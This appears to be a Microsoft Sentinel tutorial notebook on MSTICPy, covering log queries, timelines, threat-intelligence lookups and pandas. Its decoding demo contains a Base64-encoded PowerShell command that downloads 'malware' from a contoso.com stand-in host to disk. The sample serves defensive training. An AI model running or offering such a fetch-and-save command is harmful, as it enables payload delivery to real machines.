This notebook takes you through some of the features of Microsoft Sentinel Notebooks and MSTICPy.
If you are new to notebooks, we strongly recommend starting with the A Getting Started Guide For Microsoft Sentinel ML notebooks.
After you've finished running this notebook, we also recommend exploring the other Microsoft Sentinel notebooks.
Each topic includes 'learn more' sections to provide you with resources to dive deeper into each of these topics. We encourage you to work through the notebook from start to finish.
This cell installs/updates and initializes the MSTICPy package. It should complete without errors.
If you see errors or warnings about missing configuration, please return to the A Getting Started Guide For Microsoft Sentinel ML notebook or the Configuring your environment guide to correct this.
%pip install --upgrade --quiet msticpy
REQ_PYTHON_VER="3.8"
REQ_MSTICPY_VER="2.0.0"
# initialize msticpy
import msticpy as mp
mp.init_notebook(
    namespace=globals(),
    extra_imports=["urllib.request, urlretrieve"],
    friendly_exceptions=False,
)
We will use MSTICPy's QueryProvider class to query data.
Some of the next section is a review of material contained in the A Getting Started Guide For Microsoft Sentinel ML notebook.
The query provider class has one main job: running queries against a data source and returning the results.
Query results are always returned as pandas DataFrames. If you are new to using pandas, look at the Introduction to Pandas section at the end of this notebook.
You can use this notebook with either live data queried from Microsoft Sentinel or with sample data downloaded from the Azure-Sentinel-Notebooks GitHub.
Run the following cell and use the option buttons to select which of these you want to use. The option buttons use a timeout. After 15 seconds the default of "Demo data" will be automatically selected.
data_opt = nbwidgets.OptionButtons(
    description="Choose the data source",
    buttons=["Microsoft Sentinel", "Demo data"],
    default="Demo data",
    timeout=15,
)
await data_opt.display_async()
Most of the code in the cell below handles the download of the demo data.
1. Demo data is still downloaded even if you chose Microsoft Sentinel (although it is cached after the first download). The demo data is used as a backup if the queries to the Microsoft Sentinel workspace return no data.
2. If you see a warning "Runtime dependency of PyGObject is missing" when loading the
Microsoft Sentinel driver please see the FAQ section at the end of the
A Getting Started Guide For Microsoft Sentinel ML Notebooks notebook.
from urllib.request import urlretrieve
from pathlib import Path
from IPython.display import HTML
from tqdm.auto import tqdm
GH_URI = "https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/{file_name}"
GH_FILES = {
    "exchange_admin.pkl": "src/data",
    "processes_on_host.pkl": "src/data",
    "timeseries.pkl": "src/data",
    "data_queries.yaml": "src/data",
    "aad_logons.pkl": "src/data",
    "host_logons.pkl": "src/data",
    "alerts_list.pkl": "src/data",
}
def _get_gh_files(files):
    """Download sample files from GitHub, skipping any already cached locally."""
    tgt_path = Path("./asn_data")
    tgt_path.mkdir(exist_ok=True)
    for file, path in tqdm(files.items(), desc="File downloads", unit="file"):
        file_path = tgt_path.joinpath(file)
        if file_path.is_file():
            continue  # already downloaded
        url_path = f"{path}/{file}" if path else file
        urlretrieve(GH_URI.format(file_name=url_path), file_path)
    print("Files downloaded:", ", ".join(files.keys()))
def _update_timestamps(file):
    """Shift datetime columns in the sample data so events appear recent."""
    if not file.endswith(".pkl"):
        return
    data = pd.read_pickle(file)
    date_cols = data.select_dtypes("datetime").columns
    for col in date_cols:
        now_delta = pd.Timestamp("now") - data[col].max()
        data[col] = data[col] + now_delta
    if not date_cols.empty:
        data.to_pickle(file)
print("Downloading sample files...")
_get_gh_files(GH_FILES)
for file in GH_FILES:
    _update_timestamps(f"./asn_data/{file}")
# Create local data provider
qry_prov = QueryProvider("LocalData", data_paths=["./asn_data"], query_paths=["./asn_data"])
print("Local data query provider loaded")
qry_prov.connect()
# Create Microsoft Sentinel provider
qry_prov_azs = QueryProvider("AzureSentinel")
if data_opt.value and data_opt.value.casefold() != "demo data":
    # Use Microsoft Sentinel as the primary provider and keep local data as backup
    qry_prov_loc = qry_prov
    qry_prov = qry_prov_azs
    display(HTML("""
    <div style="color: White; background-color: DarkOliveGreen; padding: 5px">
    <p style="font-size: 20px">Using Microsoft Sentinel as primary data source.</p>
    <p>Please copy the code and click on the URL to authenticate
    to Microsoft Sentinel if prompted to do so.</p>
    </div>
    """))
    qry_prov.connect(WorkspaceConfig())
else:
    display(HTML("""
    <div style="color: White; background-color: DarkOliveGreen; padding: 5px">
    <p style="font-size: 20px">Using local data as primary data source.</p>
    </div>
    """))
Now that we have connected we can query Microsoft Sentinel for data.
Before we do that there are a couple of things that help us understand what data is available to query.
The AzureSentinel QueryProvider has a "schema_tables" property that lets us get a list of tables as well as the schema (column names and data types) for each table.
After that we'll look at the queries available.
Note: For local data this will just appear as a list of files.
# Get list of tables in our Workspace with the 'schema_tables' property
qry_prov.schema_tables[:10] # We are outputting only a sample (first 10) tables for brevity
# remove the "[:10]" to see the whole list
# Display the schema for a single table
if qry_prov.environment == "AzureSentinel":
    print(qry_prov.schema["SigninLogs"])
else:
    md(
        "Note: this is the schema of a local pandas DataFrame"
        " that emulates the Microsoft Sentinel schema"
    )
    display(qry_prov.Azure.list_all_signins_geo().dtypes)
MSTICPy includes a number of built-in queries. Most require additional parameters, such as the time range, and often an identifying parameter such as the host name, account name, or IP address that you are querying for.
You can also list available queries from Python code with:
qry_prov.list_queries()
Get specific details about a query by calling it with "?" as a parameter:
qry_prov.Azure.list_all_signins_geo("?")
The query browser combines both of these functions in a scrollable and filterable list.
qry_prov_azs.browse_queries()
Datetime strings are painful to type in and keep track of.
Fortunately MSTICPy has an easier way to specify time parameters for queries:
- the qry_prov.query_time widget to set the default time range for queries
- the nbwidgets.QueryTime class to set a custom time range

Example of using a standalone nbwidgets.QueryTime instance:
timerange = nbwidgets.QueryTime(units="day")
qry_prov.WindowsSecurity.list_host_logons(timerange, host_name="my_host")
qry_prov.query_time
# The QueryProvider will automatically
# extract the "start" and "end" parameters from the query_time property to use in the query.
logons_df = qry_prov.Azure.list_all_signins_geo()
# You can also specify these parameters explicitly
# logons_df = qry_prov.Azure.list_all_signins_geo(
# start=qry_prov.query_time.start,
# end=qry_prov.query_time.end,
# )
if logons_df.empty:
    md("The query returned no rows for this time range. Using demo data.")
    logons_df = qry_prov_loc.Azure.list_all_signins_geo()
# display first 5 rows of any results
logons_df.head() # If you have no data you will just see the column headings displayed
Most built-in queries support the "add_query_items" parameter. You can use this to append additional filters or other operations to the built-in queries.
from datetime import datetime, timedelta
if qry_prov.environment == "AzureSentinel":
    # Actually run the query if using Microsoft Sentinel data
    display(
        qry_prov.SecurityAlert.list_alerts(
            start=datetime.utcnow() - timedelta(2),
            end=datetime.utcnow(),
            add_query_items="| summarize NumAlerts=count() by AlertName",
        ).head()
    )
else:
    # Emulate the results using pandas for local data
    display(
        qry_prov.SecurityAlert.list_alerts()[["AlertName", "TimeGenerated"]]
        .groupby("AlertName")
        .count()
        .rename(columns={"TimeGenerated": "NumAlerts"})
        .head()
    )
Another way to run queries is to pass a full KQL query string to the query provider.
This will run the query against the workspace connected to above, and will return the data in a Pandas DataFrame. We will look at working with Pandas in a bit more detail later.
Note: exec_query is not supported for local data.
# Define our query
test_query = """
OfficeActivity
| where TimeGenerated > ago(1d)
| take 5
"""
# Pass that query to our QueryProvider
if qry_prov.environment == "LocalData":
    print("exec_query not supported for local data")
    print(test_query)
else:
    office_events_df = qry_prov.exec_query(test_query)
    display(office_events_df)
Visualizing data is an excellent way to analyze it and to identify patterns and anomalies.
Python has a wide range of data visualization packages, each of which has its own benefits and drawbacks.
We will look at some basic capabilities as well as one of the visualizations in MSTICPy.
Basic Graphs
Pandas and Matplotlib provide the simplest way to produce basic plots of data:
# Limit the data to at most the first 100 rows
plot_df = logons_df
if len(plot_df) > 100:
    plot_df = plot_df[:100]
# Plot a horizontal bar chart of logon counts per IP address
plot_df["IPAddress"].value_counts().plot.barh(
    title="IP prevalence", legend=False, figsize=(8, 8)
);
# Plot the same counts as a pie chart to show each IP's share of logons
plot_df["IPAddress"].value_counts().plot.pie(
    figsize=(8, 10), title="Share of Logons per IP"
);
Much like the built-in pandas "plot" function, MSTICPy adds an event timeline plotting accessor to DataFrames.
Using the mp_plot.timeline() method on a DataFrame, you can visualize the relative timing of events much more easily than from a data table.
Unlike the previous Matplotlib charts, the Event Timeline uses Bokeh plots making it interactive.
Using the toolbar buttons (to the left of the chart) you can pan, zoom, and save the chart image.
You can also use the Range Tool (the small graphic beneath the main timeline) to zoom in on a section of the plot.
Notes:
1. If your data uses a different time column, you can specify it with df.mp_plot.timeline(time_column="EventStartTimeUTC", ...)
2. If there are a lot of logons in your query result the timeline may appear crowded - use the range tool to zoom in on areas of interest.
You can also use the standalone timeline functions:
from msticpy.vis.timeline import display_timeline, display_timeline_values
from msticpy.vis.timeline_duration import display_timeline_duration
display_timeline - shows events as discrete diamonds: display_timeline(data, ...[other params])
disp_cols = ["UserPrincipalName", "IPAddress", "AppDisplayName", "Result"]
logons_df.mp_plot.timeline(
    title="Logon events",
    source_columns=disp_cols,  # columns displayed in hover
)
logons_df.mp_plot.timeline(
    title="Logon events by User",
    source_columns=disp_cols,  # columns displayed in hover
    group_by="Result",
)
Using the group_by parameter to partition the data

logons_df.mp_plot.timeline(
    group_by="AppDisplayName",
    source_columns=disp_cols,
)
logons_df.mp_plot.timeline(
    group_by="IPAddress",
    source_columns=["AppDisplayName"],
)
Now that we have seen how to query for data and perform some basic manipulation, we can look at enriching this data with additional data sources.
For this we are going to use an external threat intelligence provider to give us some more details about an IP address in our dataset, using the MSTICPy TILookup feature.
# Create our TI provider
ti = TILookup()
# Get the first logon IP address from our dataset
ip = logons_df.iloc[0]["IPAddress"]
md(f"IP Address to lookup is {ip}")
# Look up the IP with our configured TI providers
ti_resp = ti.lookup_ioc(ip)
# Format our results as a DataFrame
ti_resp = ti.result_to_df(ti_resp)
display(ti_resp)
ti_results = ti.lookup_iocs(logons_df[["IPAddress"]].drop_duplicates().head(), "IPAddress")
ti.browse_results(ti_results, severities=["information", "warning", "high"])
MSTICPy includes further threat intelligence capabilities as well as other data enrichment options. More details on these can be found in the documentation.
With the data we have collected we may wish to perform some analysis on it in order to better understand it.
MSTICPy includes a number of features to help with this, and there are a vast array of other data analysis capabilities available via Python ranging from simple processes to complex ML models.
We will start simply and look at how we can decode some obfuscated command lines, so that we understand their content.
from msticpy.transform import base64unpack as b64
# Take our Base64-encoded PowerShell command
b64_cmd = "powershell.exe -encodedCommand SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl"
# Unpack the Base64 encoded elements
unpack_txt = b64.unpack(input_string=b64_cmd)
# Display our results, transposed for easier reading
unpack_txt[1].T
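Under the hood, this kind of unpacking is ordinary Base64 decoding applied to encoded runs found in the input. As a rough sketch (not MSTICPy's actual implementation - the helper name, regex, and minimum-length threshold here are our own assumptions), the core step can be reproduced with only the standard library:

```python
import base64
import re

# Hypothetical helper, NOT part of MSTICPy: find and decode plausible
# Base64 runs in a command line. A real unpacker also handles padding
# variants, nested encodings, and binary payloads - this sketch only
# decodes runs that turn out to be clean UTF-8 text.
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

def decode_b64_substrings(command_line: str) -> list[str]:
    """Return decoded text for each plausible Base64 run in the string."""
    decoded = []
    for match in B64_RE.findall(command_line):
        try:
            decoded.append(base64.b64decode(match).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64 text - skip it
    return decoded

cmd = (
    "powershell.exe -encodedCommand "
    "SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl"
)
print(decode_b64_substrings(cmd))
```

The MSTICPy unpack function does considerably more (nested archives, hash computation, a results DataFrame), but the decoding step above is the heart of it.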
We can also use MSTICPy to extract Indicators of Compromise (IoCs) from a dataset.
The IoCExtract class makes it easy to extract and match on a set of IoCs within our data.
In the example below we take a US Cybersecurity & Infrastructure Security Agency (CISA) report and extract all URLs listed in the report.
import requests
# Set up our IoCExtract object
ioc_extractor = IoCExtract()
# Download our threat report
data = requests.get("https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml")
# Extract URLs listed in our report
iocs = ioc_extractor.extract(data.text, ioc_types=["url"])["url"]
# Display the first 5 iocs found in our report
list(iocs)[:5]
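For intuition, the extraction step is essentially pattern matching: IoCExtract maintains a built-in regex per IoC type and returns the matches grouped by type. A deliberately simplified, hypothetical sketch of URL extraction (MSTICPy's real patterns are far more thorough, covering defanged and encoded forms) looks like this:

```python
import re

# Hypothetical simplified pattern - not MSTICPy's actual URL regex
URL_RE = re.compile(r"\bhttps?://[^\s\"'<>\]\)]+", re.IGNORECASE)

def extract_urls(text: str) -> set[str]:
    """Return the unique set of URL-like strings found in the text."""
    return set(URL_RE.findall(text))

# Invented example text, standing in for the downloaded report
report_snippet = (
    "The actor hosted payloads at defanged and live URLs such as "
    "https://example.com/payload.bin and http://198.51.100.7/stage2 ..."
)
print(extract_urls(report_snippet))
```

Returning a set is the same design choice IoCExtract makes for each IoC type: duplicates in a long report are collapsed so each indicator appears once.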
There are a wide range of options when it comes to data analysis in notebooks using Python. Here are some useful resources to get you started:
Pivot functions use the concept of Cyber Entities to group MSTICPy functionality logically.
An entity is something like an Account, IP Address or Host, and has one or more identifying properties.
Pivot functions are methods of Entities that provide quick access to queries, enrichment functions, and other utilities related to that entity.
Pivot functions are dynamically attached to entities, so we need to load the Pivot library to initialize them.
import warnings
from msticpy.datamodel.entities import *
with warnings.catch_warnings():
    warnings.simplefilter("ignore")
    pivot = Pivot(namespace=globals())
Use the pivot browser to see what functions are available for different entities.
The Help drop-down panels show you more detail about the selected function.
pivot.browse()
You can pass a single value to a pivot function.
The result is returned as a pandas DataFrame.
Here are five examples with the output shown below.
from IPython.display import HTML
display(HTML("Dns resolution<br>"))
display(Dns.dns_resolve("www.microsoft.com"))
display(HTML("<br>Dns components<br>"))
display(Dns.util.dns_components("www.microsoft.com"))
display(HTML("<br>IP address type<br>"))
display(IpAddress.ip_type("24.16.133.227"))
display(HTML("<br>IP address ownership<br>"))
display(IpAddress.whois("24.16.133.227"))
display(HTML("<br>IP address location<br>"))
display(IpAddress.geoloc("24.16.133.227"))
You can also pass a DataFrame as a parameter. You also need to provide the column name that contains the data that you want to process.
logons_subset = logons_df.drop_duplicates("IPAddress").head()
IpAddress.whois(logons_subset, column="IPAddress")
When using a DataFrame as input, you can also join the output data to the input data.
IpAddress.whois(logons_subset[["IPAddress", "AppDisplayName", "TimeGenerated"]], column="IPAddress", join="left")
And because pivot functions always return DataFrames, you can easily use the output as input to MSTICPy functions.
The first example shows sending the results from the WhoIs pivot function to a timeline plot.
IpAddress.whois(
    logons_subset[["IPAddress", "AppDisplayName", "TimeGenerated"]],
    column="IPAddress",
    join="left",
).mp_plot.timeline(group_by="asn_description")
The second example shows using the tilookup_url Url pivot function to check threat intelligence reports for a URL, and passing the output to the TILookup results browser.
TILookup.browse_results(Url.tilookup_url("http://85.214.149.236:443/sugarcrm/themes/default/images/"))
This notebook has shown some basic components of MSTICPy and how to use them in Microsoft Sentinel notebooks for security investigations.
There are many more things possible using notebooks. We strongly encourage you to read the material referenced in the "Learn More" sections in this notebook.
You can also explore the other Microsoft Sentinel notebooks in order to take advantage of the pre-built hunting logic, and understand other analysis techniques that are possible.
If you are working with data in notebooks a lot, you will want to learn about pandas. Our query results are returned in the form of a pandas DataFrame: DataFrames are pivotal to Microsoft Sentinel notebooks and MSTICPy and are used for both input and output formats.
Pandas DataFrames are incredibly versatile data structures with a lot of useful features. You might think of them as programmable Excel worksheets.
We will cover a few of them here; see the Learn more section for further resources on pandas features.
The first thing we want to do is display our DataFrame. If the DataFrame is the last item in a code cell, you can just run the cell to display the data.
You can use the Jupyter display function - display(df) - to display it explicitly; this is especially
useful if you want to display a DataFrame from the middle of a code block in a cell.
# For this section we reuse the logons DataFrame retrieved earlier
data = logons_df
# Display our DataFrame - using head to limit to first 3 rows
display(data.head(3))
You may not want to display the whole DataFrame and instead display only a subset of items.
There are numerous ways to do this and the cell below shows some of the most widely used functions.
md("Data size:", "bold")
md(f"DataFrame shape is {data.shape[0]} rows x {data.shape[1]} columns")
md("Display the first 2 rows using head(): ", "bold")
display(data.head(2))
md("Display the row at position 3 using iloc[]: ", "bold")
display(data.iloc[3])
md("Show the column names in the DataFrame: ", "bold")
display(data.columns)
md("Display just the TimeGenerated and TenantId columns: ", "bold")
display(data[["TimeGenerated", "TenantId"]].head())
We can also choose to select a subset of our DataFrame by filtering the contents of the DataFrame.
data[<boolean expression>] returns all rows in the DataFrame where the boolean expression is True.
md("Display only rows where AppDisplayName value is 'Azure Portal': ", "bold")
filtered_df = data[data['AppDisplayName'] == "Azure Portal"]
display(filtered_df.head())
md("Display rows where ClientAppUsed is either 'Browser' or 'Mobile Apps and Desktop clients':", "bold")
filtered_df = data[data["ClientAppUsed"].isin(["Browser", "Mobile Apps and Desktop clients"])].head()
display(filtered_df)
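You can also combine conditions with the & (and), | (or), and ~ (not) operators. Each condition must be wrapped in parentheses because of Python operator precedence. A small self-contained sketch, using a synthetic DataFrame (the column values below are invented stand-ins for the logons data):

```python
import pandas as pd

# Synthetic stand-in for the logons data used above
df = pd.DataFrame({
    "AppDisplayName": ["Azure Portal", "Office 365", "Azure Portal", "Teams"],
    "ClientAppUsed": ["Browser", "Browser", "Mobile Apps and Desktop clients", "Browser"],
    "ResultType": [0, 0, 50126, 0],
})

# Combine two conditions: Azure Portal logons that used a browser
mask = (df["AppDisplayName"] == "Azure Portal") & (df["ClientAppUsed"] == "Browser")
portal_browser = df[mask]
print(portal_browser)

# Negate a condition with ~ : everything except rows where ResultType is 0
failures = df[~(df["ResultType"] == 0)]
print(failures)
```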
Grouping and calculating aggregate totals on the groups is done using the groupby
function.
# The basic groupby syntax counts all columns other than the group column
display(data.groupby("AppDisplayName").count().head())
# Selecting a subset of the columns and renaming gives a more readable output.
display(
    data[["AppDisplayName", "TimeGenerated"]]
    .groupby("AppDisplayName")
    .count()
    .rename(columns={"TimeGenerated": "AppCount"})
    .head()
)
# Note: you can surround dataframe chained operations (as in the previous example)
# with parentheses to split them into a more readable format.
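An alternative to the count()/rename() pattern above is groupby().agg() with named aggregation, which computes several labeled aggregates in one step. A sketch on a small synthetic DataFrame (the values are invented):

```python
import pandas as pd

# Synthetic stand-in for the logons data
df = pd.DataFrame({
    "AppDisplayName": ["Azure Portal", "Azure Portal", "Office 365"],
    "TimeGenerated": pd.to_datetime(
        ["2024-01-01 10:00", "2024-01-01 12:00", "2024-01-01 11:00"]
    ),
})

# Named aggregation: one output column per (source column, function) pair
summary = df.groupby("AppDisplayName").agg(
    AppCount=("TimeGenerated", "count"),
    FirstSeen=("TimeGenerated", "min"),
    LastSeen=("TimeGenerated", "max"),
)
print(summary)
```

This avoids the rename step entirely and makes it easy to add further statistics later.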
Our DataFrame can also be extended with new columns containing additional data if required. The new column data can be static or calculated, as shown in these examples.
data_mod = data.copy()
data_mod["NewCol"] = "Look at my new data!"  # Add the same string to every row in this column
data_mod["Plus1Day"] = data_mod["TimeGenerated"] + pd.Timedelta("1d")  # Calculated column (add 1 day to the timestamp)
display(data_mod[["TenantId", "AppDisplayName", "TimeGenerated", "NewCol", "Plus1Day"]].head(5))
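The same columns can also be added in a chained style with assign(), which returns a new DataFrame rather than mutating the original and composes nicely with other chained operations. A sketch on a synthetic frame (the values are invented):

```python
import pandas as pd

# Synthetic stand-in for the data used above
df = pd.DataFrame({
    "TimeGenerated": pd.to_datetime(["2024-01-01 10:00", "2024-01-02 09:30"]),
})

# assign() adds columns and leaves the original DataFrame untouched
df_ext = df.assign(
    NewCol="Look at my new data!",  # static value broadcast to every row
    Plus1Day=lambda d: d["TimeGenerated"] + pd.Timedelta("1d"),  # computed per row
)
print(df_ext)
```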
There is a lot more you can do with Pandas, the links below provide some useful resources: